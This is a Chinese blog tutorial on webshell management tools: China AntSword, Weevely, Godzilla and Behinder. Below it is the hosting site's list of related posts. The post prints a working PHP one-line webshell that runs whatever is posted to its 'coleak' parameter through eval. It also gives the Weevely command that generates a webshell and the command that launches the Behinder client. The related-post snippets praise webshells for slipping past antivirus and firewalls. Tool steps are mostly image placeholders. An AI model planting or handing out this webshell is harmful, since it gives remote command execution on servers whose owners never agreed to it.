web安全之Webshell管理工具

已于 2022-12-10 01:03:08 修改
阅读量2.1k 收藏 6
点赞数 1
分类专栏: # web安全 文章标签: web安全 安全
于 2022-12-08 22:00:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63701832/article/details/128242185
版权

目录

漏洞原理

工具

中国蚁剑(antsword)

weevely(kali)

godzilla

Behinder

 

漏洞原理

上传PHP一句话木马到服务器

<?php
	header("Content-type:text/html;charset=gb1232");
	echo "<pre>";
	@eval($_POST['coleak']); 
?>

找到上传路径后通过给coleak赋值执行系统命令

3cb1f884da284d8ebaf9473ea6070759.png

f03dfe66cbf145fc89641795e065087c.png

工具

中国蚁剑(antsword)

c72ef184110a42b9b49e449318ffb652.png

74d673b559744e0a904002a665ae4f1b.png

weevely(kali)

c79d05f619154e1f9ad2442b982991d4.png

 weevely generate coleak weevely.php

db3ebadc1a1e455e94e9fc3379ec230a.png

79512070ee2f4b02a5a55f1e32d147d0.png

godzilla

b707bcb6e3494e9796b509b01fddd1fc.png

 上传到文件目录内

85e03346396f44c68e728e9f3215cb60.png

 测试连接

 60678d73c51e47748949d31f047f04ee.png

2f07844e693a4827ad1b5dc390703b62.png

11039af1710f40fc9b1d8eb7142e17a0.png

Behinder

974d12dfb8f5490381fb26272ce44054.png 

3d9364179b7b4e798b4e550a069d5536.png

注:Behinder可能存在脚本无法打开的情况

原因:冰蝎beta7版本客户端不再内置javafx库,java11以后版本移除了JavaFX库,要运行冰蝎需要自己下载JavaFX库

JavaFX - Gluon (gluonhq.com)

start javaw --module-path "D:\openjfx-18.0.2_windows-x64_bin-sdk\javafx-sdk-18.0.2\lib" --add-modules=javafx.base --add-modules=javafx.controls  --add-modules=javafx.fxml  --add-modules=javafx.graphics  --add-modules=javafx.media  --add-modules=javafx.swing  --add-modules=javafx.web -jar Behinder.jar 

修改好下载的lib库,执行上面代码即可启动 

 

coleak
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
网络安全学习小结--kali基本工具webshell、代码审计
Tauil的博客
08-09 2500
webshell连接工具:中国菜刀、Cknife、Altman、xise、Weevely、quasibot、Webshell-Sniper、蚁剑 antSword、冰蝎 Behinder、webacoo、哥斯拉 Godzilla、PhpSploit。两方连接通话命令,假定AB进行连接,A(1.1.1.1)为控制端,B(2.2.2.2)为受控端,前后不同即为开启顺序不同。漏洞脚本库,提权,shell获取等等。暴力遍历网站目录,获取网站结构。木马制作,后门连接shell。也有一句话木马,设定密码为。...
kali下的webshell工具-Weevely
@小张小张的博客
09-29 3620
kali下的webshell工具-Weevely weevely是适用于php网站的webshell工具,使用weevely生成的木马免杀能力较强,而且使用加密连接,往往能轻松突破WAF拦截。 Weevely工具使用Python语言编写,集生成木马与连接于一身,相当于Linux中的中国菜刀,但只适用于php网站,支持图片与.htaccess两种绕过方式。生成的木马文件进行了base64加密处理。它实现了SSH 风格的终端界面,并有大量自动化的模块。测试人员可用它执行系统指令、远程管理和渗透后期的自动渗透;
Kali工具-webshell之weevely
liwangjin0116的专栏
03-29 707
kali中常用的webshell工具-weevely,可以对网站的文件上传漏洞进行测试。
Kali自带的webshell客户端
Yale的博客
12-26 3252
0x01 第一个要介绍的是webacoo。 webacoo旨在通过HTTP在客户端和web服务器之间提供类似隐形终端连接。它是一个后渗透利用工具,能够维持对已被拿下的web服务器的权限访问。WeBaCoo可以绕过最新的AV,NIDS,IPS,网络防火墙和应用防火墙的检测,能够在被拿下的服务器中悄无声息的执行系统命令。 首先使用-h看看用法 简单的翻译如下: -g Generate bac...
Webshell连接工具安装&使用教程&版本区别(后续会间歇性更新)
最新发布
huayimy的博客
07-07 2386
目前常见的webshell工具有菜刀、冰蝎、蚁剑、哥斯拉,还有weevely、Altman和QuasiBot等一些大佬根据菜刀开发的开源webshell连接工具。冰蝎、蚁剑、哥斯拉等自带加密webshell工具用的最为广泛,目前也在不断的维护和更新,三款工具都有两三次大版本更新,其使用方法不同,特征也有所不同。
强大的webshell管理工具-哥斯拉
12-27
总结来说,哥斯拉是一个强大的Webshell管理工具,适用于安全研究人员和系统管理员进行网站安全维护。它的主要功能包括Webshell的扫描、分析、管理、清除等,且具有跨平台的特性,通过Java运行环境可轻松在不同操作...
webshell管理工具
01-11
Webshell管理工具是一种在Web服务器上运行的程序,主要用于远程管理和控制网站服务器。它的一句话管理工具特性,意味着用户可以通过简洁的命令行输入,执行多种复杂的服务器操作,从而提高工作效率,减少管理负担。...
强大的webshell管理工具——冰蝎
12-26
【冰蝎:强大的WebShell管理工具】 在网络安全领域,WebShell是一种常见的攻击手段,它允许攻击者通过在目标服务器上部署后门程序来控制或监控网站。冰蝎(Behinder)是一款专为WebShell管理设计的强大工具,它以其...
最新WebShell管理工具增强版3.0
05-06
"最新WebShell管理工具增强版3.0"显然是这个工具的最新升级版本,它提供了更多的功能和优化,以满足用户对更高效、安全Web服务管理的需求。 首先,我们要理解WebShell的基本概念。WebShell通常是通过上传恶意脚本...
网络安全——Webshell管理工具
weixin_54055099的博客
08-21 4420
Webshell的应用,中国菜刀、蚁剑、weevely、御剑、Havij的使用
开源Webshell利用工具Altman
07-24
开源Webshell利用工具——Altman: Altman基于.Net4.0开发,兼容Mono,理论上可以运行在windows、linux和mac等平台。(windows和ubuntu平台已经详细测试过,完美运行)是的,一直工作在kali下的同学有福了,只要简单的配置一下,Altman就可以运行在kaili上了( 需要安装Mono(>=3.2.8)以及libgdiplus)Altman整个程序采
Kali下常见webshell管理工具汇总
ncafei的博客
04-24 1万+
转 自 https://www.ohlinge.cn/kali/kali_webshell.html 0x01 前言 Kali Linux作为一款专为渗透测试而生的Linux操作系统,在安全界的影响广泛。一般的webshell在Windows下面经常使用Chopper(中国菜刀)来管理,那么在Linux下面,有没有类似的工具来达到类似的效果呢?答案是肯定的。 0x02 跨平台版菜刀:Ck
kali linux之webshell
weixin_30617737的博客
03-03 884
webacoo(web backdoor cookie) 类终端的shell 编码通信内容通过cookie头传输,隐蔽性较强 cm:base64编码的命令 cn:服务器用于返回数据的cookie头的名 cp:返回信息定界符 选项: -f 系统函数使用功能1:system(默认)2:shell_exec3:exec4:passthru5:popen -g生成后门代...
渗透利器 | 常见的WebShell管理工具
热门推荐
03-02 2万+
攻击者在入侵网站时,通常要通过各种方式写入Webshell,从而获得服务器的控制权限,然后再执行系统命令、权限提升、读取配置文件、窃取用户数据,篡改网站页面等操作。本文介绍十款常用的We...
渗透测试获取webshell方法总结
u013930899的博客
10-06 3245
本文总结了渗透测试php网站获取webshell的几种方法
kali中的webshell工具--webacoo
weixin_30698527的博客
03-10 876
webacoo webshell其实就是放置在服务器上的一段代码 kali中生成webshell工具 WeBaCoo(Web Backdoor Cookie) 特点及使用方法 类终端的shell 编码通信内容通过cookie头传输,隐蔽性强 cookie中传递数据使用的参数: cm:base64编码的命令 cn:服务器用于返回数据的cooki...
Kali Linux自带webshell的使用
汗的博客
03-31 6658
大家都比较喜欢用菜刀、蚁剑、冰蝎这类图形化webshell管理工具,但是webshell的知识还是要有的,比如反弹常用的webshell。我简单介绍一下kali自带的反向webshell Kali自带webshell目录: /usr/share/webshells/ 可以看到有asp、aspx、jsp、perl、php等类型webshell 主要谈谈反弹的phpwebshellphp-rever...
23个常见Webshell网站管理工具
weixin_54787877的博客
03-20 5232
注 文章来源:“潇湘信安”公众号 这篇文章笔者整理了目前所见到过的大部分Webshell网站管理工具,这里只对这些工具做了简单介绍,并没有写具体使用方式,大家如果有兴趣可以自己去看一下使用说明,同时也欢迎大家补充一些类似工具。 目前国内安全人员常用的有:中国菜刀、中国蚁剑、冰蝎、哥斯拉、Metasploit、SharPyShell等,也有一些内部团队开发的类似工具,但是并没有对外公开。 (1) 中国菜刀(Chopper) 中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚
常见的 WebShell 管理工具
05-21
4. GFS Web-Shell:一款高级的 WebShell 管理工具,支持多种语言和文件格式,提供了多种安全控制选项。 5. Antichat Shell:一款简单易用的 WebShell 管理工具,支持多种操作系统和语言,可以执行多种命令和文件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

coleak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值